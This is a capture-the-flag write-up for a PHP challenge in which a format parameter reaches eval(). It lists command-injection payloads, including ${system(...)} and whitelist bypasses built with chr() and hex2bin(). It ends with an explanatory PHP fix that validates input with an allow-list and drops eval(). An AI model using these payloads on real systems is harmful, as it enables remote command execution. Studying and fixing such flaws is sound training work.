Lovetok

The website:

We can see that the back-end returns the time when we give a certain value to the format parameter:

We also have the code:

We can see that the input we give, 'r', goes directly into the eval function:

So we need to inject code here somehow, but how?

We can try different code payloads, like:

  1. ${system($_GET[cmd])}&cmd=ls

  2. ${print(`ls`)}

  3. to bypass the whitelist:

    1. ${system(chr(105).chr(100))}
    2. ${system(hex2bin(6964))}
  4. to bypass restriction for slashes read

And we get the flag:
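
Why the payloads listed above work, and the change that removes the bug, as an added example that is not the challenge's source code. The vulnerable shape in the comment is an assumption based on the description of input reaching eval, and the names `FORMAT_ALLOWED`, `safe_format` and `render_time` are hypothetical.

```php
<?php
// Added example. Function and constant names are hypothetical.
date_default_timezone_set('UTC');

// Assumed vulnerable shape, kept as a comment so nothing here calls eval():
//   eval('$time = date("' . $format . '");');
// PHP evaluates ${expr} inside a double-quoted string literal, so the
// expression runs when eval() parses that literal. The chr()/hex2bin()
// payloads need no quote characters, which is why filtering quotes or
// slashes does not stop them.

// Allow-list: letters (date() format characters) and a few separators.
// No $, braces, parentheses, backticks, quotes or backslashes.
const FORMAT_ALLOWED = '/\A[A-Za-z :\/.,-]{1,32}\z/';

// Returns the format unchanged if it passes the allow-list, otherwise null.
function safe_format(string $format): ?string
{
    return preg_match(FORMAT_ALLOWED, $format) === 1 ? $format : null;
}

// The fix: call date() directly. The format is passed as data and is never
// parsed as PHP source. Falling back to 'r' is an assumption of this example.
function render_time(string $format, int $timestamp): string
{
    return date(safe_format($format) ?? 'r', $timestamp);
}

// Constructed inputs: two benign formats and two payload shapes from the list.
$samples = [
    'r',
    'Y-m-d H:i',
    '${print(`ls`)}',
    '${system(chr(105).chr(100))}',
];

foreach ($samples as $s) {
    $verdict = safe_format($s) === null ? 'rejected' : render_time($s, 0);
    printf("%-32s => %s\n", $s, $verdict);
}
```

The allow-list is defence in depth. Removing eval() is what closes the injection, because a rejected or accepted format is only ever handed to date() as a string.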
